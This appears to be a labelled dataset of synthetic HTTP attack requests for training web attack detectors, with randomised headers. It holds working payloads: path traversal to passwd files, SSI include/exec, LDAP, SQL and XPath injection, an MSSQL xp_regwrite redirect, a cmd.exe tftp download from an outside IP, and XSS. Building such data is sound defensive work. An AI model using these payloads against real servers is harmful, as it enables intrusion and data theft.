Transfer-Encoding: gzip
Upgrade: tritan/6.0, s3Tsn/3.7, IThoi0/4.6
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 130460
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37154
Start - Id: 45452
class: PathTransversal
GET /nK2o2Qw1wrhFIf1mtg/ro.msf?doboqwDrpr=734&rel=241161&grf=34105&VUw7I2psA=himtho92rnrenhEen&nsHbnegmxlsyn=882&en=o5enuif%3Fho&y6Soeteoagx=Eia&fyttbgaaynpa8=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&N67eDFQ7scriptuniont=nU.LHwqK&ms=639764&vooUo1ehyeert1e=iwp-aobjecte&6y=138&6ugen5dt=0494&pnvphomeprocessing-instructionEHsNi.=aszao0Isy3cNa HTTP/1.0
Host: www.rmeiie.cz:80
Connection: rhn2yacn
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tou6-sifrraew, rso5a-aeear;q=0.8, UqToD-oSihat, tc-hdbt7mhi
Cache-Control: no-transform
Client-ip: 8.98.194.17
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="1"
Date: Mon, 15 Aug 05 24:20:38 UTC
Expect: 100-continue
If-Modified-Since: Sun, 17 Jan 10 24:09:22 CET
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: "DC0vdWRkRIA2BEBp"
If-None-Match: *
If-Range: Tue, 08 Dec 09 12:19:07 CET
Max-Forwards: 2774
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM cTQ3YU9lbmZ3emQ3YXdvaHRjcGVtU3N0dWthUnRkYmFwYWE4cG9xeWps
Range: -884,93-882862,81022-507
Referer: http://Ycaaav.uk/etEso.mdb
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.3 (Machintosh; U; Mac OS X 2.3; q7-at; rv:9.4.3) Gecko/96265811
UA-Disp: 5353,5285,32
UA-OS: FreeBSD
UA-Color: color32
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: identity
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 30742004292799508718
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 45452
Start - Id: 39519
class: SSI
GET /n5YbvA.mdb?Nut3=ma&ereiwnih=owEps%3Appa%24%3Fwe HTTP/1.1
Host: www.nete.it
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.0, x-mac-turkish, iso-8859-1;q=0.1, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Cookie: WuzeUnpT=<!--     #include  virtual="/etc/passwd" -->
Cookie2: $Version="170"
Date: Sat, 12 Apr 08 06:42:31 UTC
ETag: W/"WeRrPImoBrnYtxGi@o"
Expect: 100-continue
From: w9dere@3huy10.be
If-Modified-Since: Sat, 08 Aug 09 22:09:43 GMT
If-Unmodified-Since: Wed, 30 Aug 06 19:44:21 CET
If-Match: "B.rLOzXQ6@_mYDZ"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM TmFpbGVvZnRvYmVzb3NodWt3dW9sdEV0d21lZW5ubWFub2Vld3llb2R1c28=
Range: -444553
Referer: /thahhsnu.txt
TE: trailers,gzip
User-Agent: hfNttBnv2p
Via: 9er/2.0 59.126.207.147
Warning: 371 169.121.60.122 "odtnnnle4TbLdinltnP" "Fri, 09 Jan 09 20:17:43 GMT"
X-Forwarded-For: 81.239.118.138
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39519
Start - Id: 37373
class: LdapInjection
GET /ccc5Ml6N/LCt%uqrKsqFNDYq/t0JmdWFzRRf9q7jZl1u/oqqPrzfGEE_/quMechoeATNabIformd1/aIuBp8l3XF8dUK9/lois2hdeokeoer2iayu7.cgi?rme1ai88ancU=07342784&beilttuS2nWs3=tb&btnhsOhoE9Edo=eax&nslrilte7rlnw5=3&yDea94mo=6877&tt14TmWzoGapcth=enEgl&notl=%5Chs%25ts%2Fa6nybsn&dhnbibo=12105451&rncsie=166969636&rUe1suarahi0kh=htk17f&SDNyo_mochamBMm=i&rHE0oed1=44523 HTTP/1.0
Host: www.hmoHA.be
Connection: cm0r
Accept: application/*
Accept-Charset: iso-8859-7, iso-8859-4, iso-8859-1, iso-8859-6;q=0.2, cp-950
Accept-Encoding: *;q=0.5
Accept-Language: ) (   |   (displayName=had*) (name  = had*    )( mail=had*  )
Cache-Control: max-age=0
Client-ip: 216.28.135.192
Cookie: nlootTmenvhe=hxhO5onaadcouq0tt
Cookie2: $Version="6"
Date: Tue, 26 Aug 08 02:26:17 CET
Expect: nxeno=nemtip5e
From: 2qwem@kh2str7ngs.fr
If-Modified-Since: Sat, 25 Oct 08 17:31:46 GMT
If-Unmodified-Since: Fri, 04 Jun 04 18:03:41 GMT
If-Match: "1up@yCYqu7igCx.oa"
If-None-Match: *
If-Range: Mon, 30 Jun 08 01:42:52 UTC
Max-Forwards: 101
MIME-Version: 8.3
Pragma: siodnvIp='oarx7Ssp'
Proxy-Authorization: Digest username="bu7etgel"
Authorization: NTLM VGFhbmRvRW8xMmc2RXRjcmp0N3g1b0FzRU9udGJsV3RvQ2hhc2xoQXRuaW5h
Range: -112070,72375-
Referer: /Zl3wia/lIah/aeg1/Pha3p.rar
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: shDletdeDe/6.2.0.9.5
UA-CPU: x86
UA-OS: Solaris
Via: srN/4.3 235.20.95.32, 8.5 115.248.209.246
Transfer-Encoding: compress
Upgrade: 2B6/2.2
Warning: 419 www.jDerg.tiff "fugwm5eoioziV5wll" 
X-Forwarded-For: 170.106.4.226
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37373
Start - Id: 35073
class: SqlInjection
POST /toBaqehYioocei4rlzi/aM/InEhooncyleeptnono/c@7GEp97rDQSj./jOsWCD0IRtFk/ei/rf/cI88copyTQp.gif? HTTP/1.1
Content-Length: 175
Content-Encoding: compress
Content-MD5: bG84clNoQW1naG5rd2VmOQ==
Content-Type: application/x-www-form-urlencoded
Host: www.r6tgopi.com
Connection: keep-alive
Accept: image/*;q=0.0, application/zip;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip
Accept-Language: ei-7zaxoa, ne9aate-vtjdge
Client-ip: 31.227.206.85
Cookie: ao5aesrecne=exec   xp_regwrite     'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','oGbf','REG_SZ','DBMSSOCN,hackersip,80'
Cookie2: $Version="792"
Date: Sat, 18 Nov 06 15:12:54 GMT
Expect: 100-continue
From: iiuve@aSec9.ch
If-Modified-Since: Sun, 21 Mar 04 04:44:01 UTC
If-Match: "gbJWp2W4WVBmzVGR"
If-Range: Wed, 26 Oct 05 07:40:18 UTC
Max-Forwards: 641
Referer: /lii2/te7n/shelsqh1/xniImlue.cgi
User-Agent: uplnd0lTth/7.3.3.8
UA-Disp: 3520,0081,8
Transfer-Encoding: gzip

emau3eo=4&tpsroUqtsrf=2&ej8=s9tee Snhh=oia5<catndeletea&Tvrge=50870&1N9hMREtZnetcat=91&Sst=nymrrblel&tst6n=9997853&94oMZkelsscriptq6=Cf5tceI2hc&3-netcat9Jtx-83j=2180166701

End - Id: 35073
Start - Id: 39731
class: SSI
GET /eQ.css?HI3NxlnLb=%3C%21--+%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+--%3E HTTP/1.0
Host: 26.189.62.86
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: bhtsees-ceifAR, dB8n-ua;q=0.5, bi-iS, dbinses-lesn;q=0.9, aetr4cJ-ri4xeo;q=0.0
Cache-Control: min-fresh=63060
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="8"
Date: Sun, 08 Mar 09 14:32:19 CET
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Mon, 11 Jul 05 17:34:17 UTC
If-Unmodified-Since: Mon, 24 May 04 12:13:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Digest cnonce="o0Rwteea"
Range: -58,-7,-12255
Referer: /thmey/lon3/Fshau/ehmdif9/otzl1em1.js
TE: gzip
Trailer: Host
User-Agent: Mozilla/6.8 (X11; U; Unix 4.6; e0-fS; rv:4.6.3) Gecko/49230438
UA-CPU: x86
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 5.5 248.58.121.185, 0.5 235.82.229.117, 6.6 www.ten5.js
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39731
Start - Id: 44031
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: www.lneNiiSct.de
Connection: close
Accept: video/mpeg, application/*;q=0.1
Accept-Charset: iso-2022-jp, x-mac-cyrillic;q=0.0, euc-kr;q=0.8, windows-1258;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: apt4Ud-8rtrn;q=0.8, eggonhbz-fsbela
Cache-Control: max-stale
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Wed, 14 Jan 04 11:59:45 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: xtaeC
From: t8ara@rpmnyne.de
If-Modified-Since: Fri, 21 Sep 07 06:25:44 GMT
If-Unmodified-Since: Sun, 22 Jul 07 11:32:19 UTC
If-Match: "uVYf.tAWrHiUw44"
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: *
Max-Forwards: 0028
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: http://siRlt3.st/uekUiAl/rOepeiao/xwpp/rdKd.tar
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Accept
User-Agent: radzlesS
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44031
Start - Id: 40005
class: SSI
GET /ae/atRR/tira6awatfSabhg/e7@FduddZTox9W/emeHebebncswzieheA/h3bieFnetcatywKB4q/xTsD_4w5Plxy5C.xZC/agX0/ajESlPXT/nreeadsacixssceoIw/haDR_WzGCgIcpgYW.bin?tn4as=%3C%21+%23%3C%21--++++%23exec++++cmd%3D%22id%22--%3E HTTP/1.1
Host: www.eesadfoome.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-7, cp-936, x-mac-chinesesimp;q=0.4, euc-tw;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 21.123.30.222
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="105"
Date: Tue, 11 Oct 05 18:55:02 GMT
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: tesbu=togelfb
From: biBccc@Aoelofph.de
If-Modified-Since: Tue, 09 Feb 10 23:40:55 GMT
If-Unmodified-Since: Sat, 23 Oct 04 08:00:14 UTC
If-Match: "I7rA8GDdpMZUlRoZtk"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Wed, 20 Apr 05 10:01:30 UTC
Max-Forwards: 5560
MIME-Version: 5.0
Pragma: sL=ygcNu
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: Digest uri=/ehrttG/xoEy0sg/exechd.php3
Range: 617798-3375,457727-6999
Referer: /enso/mhcapMr/p0ruN/hioaN/lWteiiia.php
TE: deflate;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.9 (X11; U; Solaris 6.7; ee-ex; rv:4.5.8) Gecko/94867744
UA-CPU: Sparc
UA-Disp: 603,321,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40005
Start - Id: 39760
class: SSI
GET /rgrdoEzrphpllhiishh.shtml?dlaimtDetpdnjE=ocnw+&nJedmnodew4@@pA=eeal0th%5Dmushdrop&h9rihahnn=buiwstdinth%40&HR8aa=replacet&ce=eipTdw6g633s&JGcoec0dhtljkm=Ht&oluysa3na=tc2N4blII&shkhfB=scH&unionoXWR=b&eabgEcga=1323485&qzvoropeeair7=%3C%21--%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&aav=replaceus-%3A&cxe9jaocAu=1906757 HTTP/1.1
Host: www.auaca.ch
Connection: close
Accept: text/*;q=0.0, video/quicktime, audio/*;q=0.1
Accept-Charset: iso-10646-ucs-2, x-mac-arabic, iso-8859-9;q=0.8, windows-1254, iso-8859-6;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 39.180.8.168
Cookie: n09wf=c5rseaAnsyo;eebaazha=ftacei2t1raateesli;sfauyceetejn=Eesqi;ptWHJuidy_=55
Cookie2: $Version="565"
Date: Wed, 01 Aug 07 24:32:06 CET
ETag: W/"UOethF6tldF.k9x"
Expect: n5nSosn=i2ymhp;hNortnNe=sseexcj
From: ls8tIstr@r3edte.de
If-Modified-Since: Thu, 05 Aug 04 10:32:05 CET
If-Unmodified-Since: Sun, 23 Jul 06 10:39:37 CET
If-Match: "LI@ZEtIffwVKgTfZw"
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: Tue, 02 Feb 10 21:58:05 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bm43Z0wzMGl1dXlhZXRhZFRPM0hjYXI2dXM4ak52a3BuYVR4
Authorization: iIysS in8nbshm=hre9t
Range: 42-82,601-32,-86
Referer: http://www.qafhdy.cz/wnel2mn/ed0eCsas/nsn2eaga/kssdc/3ieea8.wmn
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/7.9 (compatible; MSIE 7.1; Linux i386; treiZait; teonhaa)
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 8.6 130.247.153.207, 9.4 www.svuyied9.gif, 9.7 235.249.162.153:37
Transfer-Encoding: gzip
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39760
Start - Id: 40924
class: SSI
GET /oS0eErQjiMQT/include9p4UVp/e3eqtt/muaoxoxsssrouc/slmlEf/r@oFwkK4vm/eMvfv621nmbm1_tu/05b4d/8Ses/r4pZEy2K-0Kft.html?gecx=%5D0&urem=%3C%21--+++%23odbc+++connect%3D%22ovqA%2CoNae%2Ctnri%22++++++statement%3D%22select+++*+++++from++ateAn%22--%3E&7Hhu=gV0%40ZO2mp HTTP/1.0
Host: 133.74.77.139:801
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.9, windows-1252, windows-1254, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.186.250.7
Cookie: t6=rci;N2rG=2588075
Cookie2: $Version="5"
Date: Fri, 07 Nov 08 20:51:26 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 18 Apr 07 06:18:05 GMT
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 15:11:14 GMT
Max-Forwards: 32
MIME-Version: 7.5
Pragma: oiWU9='C7lk'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: 636931-28369,572-,4003-
Referer: /Mhsndm/jetr/luIln/hIoqpo2a/4zgI.png
TE: chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/7.4 (compatible; seakg; Open BSD i586; 7qtnr4iaod; repr; ro2nni)
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: HTTP/4.8 www.Y1gmuueo.css, FTP/9.7 19.69.213.154
Transfer-Encoding: compress
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40924
Start - Id: 48417
class: XPathInjection
GET /iwtp3cPgipas6ty/fcMu3UGAH4R.EBCRKXuB/1ntudErnkoXI.js?te8ee=72035&gaf1nebmjankttn=y0fncfirKwoeilsL&ra=seotrnlswu&7m7te=itHusOm&eozstnE8s=yMu6dwsefa4&aca0aNlo=a5ruhxoigtttoae&sooxhdhEltaaHN=ifuoaKreee&6jip1x9eei3at=mjddssa0nocso&tewtps1dtwnntne=11&.fNhRie=24 HTTP/1.0
Host: 105.138.28.71:80
Connection: sseki2sn
Accept: audio/*;q=0.6
Accept-Charset: iso-8859-9, windows-1250, cp-936
Accept-Encoding: *
Accept-Language: s-aend3eEt;q=0.4, z-kmleehr, lqcee-teett, f-ke;q=0.5, jex-hqj;q=0.2
Cache-Control: min-fresh=0
Client-ip: 89.166.184.126
Cookie: ti7echsfUodazb=etfaiee;ell9lmyq5xd=lgrHiet;U@WJservices8C2=(i  <  count(Dy51r/child::text())     and    j     <    count(de3e/child::comment())    and   k    <   count(Iihwt/child::*)    );4lNbme0ps4rsgnh=0457957
Cookie2: $Version="8"
Date: Tue, 13 Mar 07 09:30:11 CET
ETag: W/"iAuTrX58wVWk91DgMt"
Expect: 100-continue
From: raintj@2nDi.com
If-Modified-Since: Thu, 16 Feb 06 15:44:26 UTC
If-Unmodified-Since: Sun, 20 Jun 04 09:03:47 UTC
If-Match: *
If-None-Match: "hD6DLSe22YD1EtyMGG"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.9
Pragma: asllat='n'
Proxy-Authorization: Digest opaque="uacst"
Authorization: NTLM RWFzRVlFOG5ya3Rnb2lzaGFjaTEzbGVzbGRlWXJocHI0ZWZvcw==
Range: 78647-,9158-,4840-
Referer: /ri7nxyt/ieekdash/ieeso/riNloef/gqene.htm
TE: deflate,deflate;q=0.6,gzip
Trailer: Authorization
User-Agent: 2sjts (hfTRro; fnF1V6_qf; naf0MzuLoe)
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 979x9457
Via: HTTP/5.5 www.et6lhet.tiff:2, ehoSe/6.0 111.121.115.183, 7.6 112.137.116.234
Transfer-Encoding: identity
Upgrade: Ode/7.1
Warning: 160 191.100.5.46 "y2fbaaTltys" "Thu, 31 May 07 10:23:19 CET"
X-Forwarded-For: 200.45.80.130
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48417
Start - Id: 37488
class: LdapInjection
GET /aVkhd0lajierOtkt/IDi8A.exe?jIsSoLmtpmeO1=xtKmmIDVbza&9eloRs=ebKRFRuj&so3=iklaezwnsufnaats&Rj0V722Fu=36&@fyNA3ST=8ZV&yeifkxrTnat=066705&mvoL5G=rysawee&oeg=oriran9eyas9t HTTP/1.1
Host: 105.144.61.114
Connection: nWioeSpl
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: ree1-ityeiat, tmowh1-boineaar;q=0.5, iatOo2-avadhrgl, nbrwEx-hafmf;q=0.2, A-j5Ilu
Cache-Control: no-cache
Client-ip: 89.147.112.207
Cookie: .Setc5Ehtacces4=ayT)(&(objectClass =    ao*)
Cookie2: $Version="28"
Date: Tue, 17 Jan 06 04:30:45 UTC
ETag: "U.WYXEjP6IvruVqLzm@"
Expect: 100-continue
If-Modified-Since: Fri, 21 Sep 07 04:13:25 UTC
If-Unmodified-Since: Fri, 25 Sep 09 05:24:00 CET
If-Match: *
If-None-Match: "-1OoHmsppxp1G-2q"
If-Range: Thu, 02 Nov 06 13:16:33 UTC
Max-Forwards: 5
MIME-Version: 0.8
Pragma: Rne=ie
Authorization: giss stsmTo=g8Vptlr
Range: -15680,16-,44-
Referer: http://Nddff.be/etn4wt/Oihe/kddn9oee/konm/atenlMtg.tar.gz
TE: gzip;q=0.5,trailers
Trailer: Date
User-Agent: Mozilla/0.7 (compatible; nt6rhe9; SunOS sun4u; tcan; etee)
Via: 7.4 104.80.215.119
Transfer-Encoding: identity
Upgrade: el802n/2.8, orur/1.2, eyTiS/2.5, ar3ys/6.2
X-Serial-Number: 461497285653885404

null

End - Id: 37488
Start - Id: 44739
class: PathTransversal
GET /tjhhmd.htm?xa=tarWaxb3%40Le8&gAp.9Cjhttp6k=9&l3oErts=%2Bhcemetaei5ctoa&73yltseart=file%3A%2F%2F%2Fb%3A%2Filwu%2Ftsst%2Fija.xml&iy=lketcx%3Cs&tsnuihrMnee=hjEhsmmina&iweOelNlDoeh=bodyyrcpdfsystemof3ipassthruenode%272E HTTP/1.1
Host: www.1naijb.st
Connection: 1rcaw
Accept: audio/*;q=0.4, application/*
Accept-Charset: macintosh, windows-1254, windows-1250
Accept-Encoding: gzip;q=0.5, identity, compress, deflate, compress;q=0.2
Accept-Language: *;q=0.4
Cache-Control: min-fresh=8
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="152"
Date: Fri, 19 May 06 06:55:10 GMT
ETag: W/"yL4GXeSmQVWeS4c"
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Wed, 11 Jun 08 17:16:14 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Sep 08 18:52:22 UTC
Max-Forwards: 91
MIME-Version: 4.7
Pragma: no-cache
Authorization: lo2T ihrdns=TosE
Range: 218-,38304-
Referer: http://jnep.net/Nasoes4/obtavpw/duetN/oarTewct/enreptuz.pdf
Trailer: TE
User-Agent: eK69eeta/5.6.8
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: deflate
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44739
Start - Id: 46145
class: PathTransversal
GET /ntabisrrft/yv5asqn7l/edb/4J/bfevqS1v9d8@/ed/hFi9z1TMZghLzSZDC/LGF@_4Fq/oRxe8uwktiagGDPr.jsp?qnJHSxI4=eVwV9zL&wlhi=3a%25f5&0eiBt=framgo&new5a1hoaalhma=60yboot.inistdinonC&detcaiu6eesrfk=6037&hH5AUpez=Junr&ix=l1C9Ki&MXqnjVvtelnetH=%40eescriptyqrezbin&s73l=333&3j=2652&hwmunoeaDanoee4=%2F%2C%2C%2C%2Fxnfyy%2Fwsieun%2Fpasswd HTTP/1.0
Host: 188.179.118.102
Connection: close
Accept: */*
Accept-Charset: macintosh, cp-932;q=0.3, windows-1250
Accept-Encoding: *
Accept-Language: h-o;q=0.5
Cache-Control: only-if-cached
Client-ip: 219.211.206.215
Cookie: oi8h9dt=46112713;.includeVyO8@JjOY=aNnwget;ulAsloH=05;access_loglIJ=3rUh
Cookie2: $Version="9"
Date: Sat, 26 Dec 09 01:59:47 UTC
ETag: "h5QIf9AhiTTvSnY@l75l"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Tue, 06 Sep 05 02:29:55 CET
If-Unmodified-Since: Wed, 02 Feb 05 05:24:53 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 6526
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: 9bHR aNt8n=lOa8lr0
Authorization: aror iyeebrdb=SAau
Range: -526467,43-,829-431383
Referer: /niont7t/eajco/mceir/ssaeat/Mobt.png
TE: deflate,deflate;q=0.2,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.8 (compatible; Konqueror/4.0; WinNT; rleaev; uoDsqen; 2exbsal)
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
Via: 1.5 238.183.46.241, 6.7 177.24.47.121, FTP/8.7 166.214.149.80
Transfer-Encoding: deflate
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46145
Start - Id: 42510
class: SqlInjection
GET /ainSlCneiOdtO/4likeexec.gif?eylners=50964274&taosoe6Ch1hrh=mSmlogrI%2Flt+&rcpUpFw-psDNREs=optiYinph-oetcS%3Ephp%5Bysunion+&aleosaehdya=zPK1wx4&jFgto2Snse=citu%3Ctpte4&Mdissei2o6Us=bnioob&MUcg1JE=OR++40295%3D40295&bc=vbscriptttgre%3FsuH%261mprocessing-instructionidhe5&5iiNfdT=%5CfoHrecopssg&numlHnetpjbugsi=00 HTTP/1.1
Host: www.0loLu.org:27
Connection: close
Accept: image/*;q=0.5, image/png, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: d=nrEfiBc
Client-ip: 17.1.105.246
Cookie: 5teh=essz;uRdy4tc=wncehtneiijr;jaan6pccDtaegi=8158875755
Cookie2: $Version="9"
Date: Mon, 15 Mar 04 07:31:47 CET
ETag: "Fhdp4@cKxDHrUkZvfQ"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Feb 04 01:49:49 UTC
Max-Forwards: 0699
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Basic YWl0bmtlZW86ZTJhNmU=
Range: 16802-
Referer: /lBer0/0rtoeet/1xeoue/se96se.rar
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.4 (compatible; dGh1aaoe; Win98; y2yLaed0; wqatel)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 5.6 65.222.130.51, 4.1 www.Rbsg.png
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42510
Start - Id: 46560
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.0
Host: www.ontpreu.ch
Connection: close
Accept: audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: 
